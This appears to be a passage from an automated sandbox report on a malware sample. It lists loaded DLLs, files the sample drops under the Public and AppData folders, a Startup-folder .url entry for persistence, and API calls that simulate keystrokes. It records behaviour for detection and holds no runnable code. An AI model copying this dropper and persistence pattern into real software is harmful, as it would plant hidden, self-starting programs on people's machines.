Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\Public\InformationCheck.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: file.exeStatic file information: File size 2016768 > 1048576
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978C7634 LoadLibraryA,GetProcAddress,0_2_00007FF7978C7634
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978678FD push rdi; ret 0_2_00007FF797867904
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797867399 push rdi; ret 0_2_00007FF7978673A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8742C0 pushad ; ret 1_2_00007FFD9B8742FD
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0048E93F push edi; ret 3_2_0048E941
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004C8A4A push FFFFFF8Bh; iretd 3_2_004C8A4C
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0048EA58 push esi; ret 3_2_0048EA5A
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00488B75 push ecx; ret 3_2_00488B88
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0047CBF1 push eax; retf 3_2_0047CBF8
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0048EC33 push esi; ret 3_2_0048EC35
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0048ED1C push edi; ret 3_2_0048ED1E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F4E93F push edi; ret 8_2_00F4E941
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F4EA58 push esi; ret 8_2_00F4EA5A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F88A4A push FFFFFF8Bh; iretd 8_2_00F88A4C
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F48B75 push ecx; ret 8_2_00F48B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F4EC33 push esi; ret 8_2_00F4EC35
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F4ED1C push edi; ret 8_2_00F4ED1E

Persistence and Installation Behavior

barindex
Source: C:\Users\Public\InformationCheck.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Users\Public\InformationCheck.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\InformationCheck.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\InformationCheck.exeJump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\InformationCheck.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.urlJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797854514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00007FF797854514
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004E59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_004E59B3
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00475EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_00475EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00FA59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,8_2_00FA59B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F35EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,8_2_00F35EDA
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004833B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_004833B7
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\InformationCheck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\InformationCheck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\InformationCheck.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
